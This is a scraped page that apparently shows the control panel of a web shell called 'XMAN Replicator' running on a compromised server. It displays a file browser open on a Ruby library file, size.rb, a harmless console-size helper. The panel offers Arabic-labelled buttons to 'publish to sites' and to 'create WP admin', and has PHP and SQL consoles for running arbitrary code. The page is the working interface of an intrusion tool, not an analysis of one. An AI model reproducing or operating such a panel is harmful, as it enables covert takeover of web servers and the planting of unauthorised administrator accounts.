🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby21
/
lib64
/
ruby
/
2.1.0
/
io
/
console
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:43
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:43
🔄
🗑️
🗑️📁
⬇️
🔒
size.rb
397 B
-rw-r--r--
2023-07-26 14:22
✏️
🔄
🗑️
⬇️
🔒
Edit: size.rb
# fallback to console window size def IO.default_console_size [ ENV["LINES"].to_i.nonzero? || 25, ENV["COLUMNS"].to_i.nonzero? || 80, ] end begin require 'io/console' rescue LoadError class IO alias console_size default_console_size end else # returns console window size def IO.console_size console.winsize rescue NoMethodError default_console_size end end
Save
PHP Console
Execute
SQL Console
Execute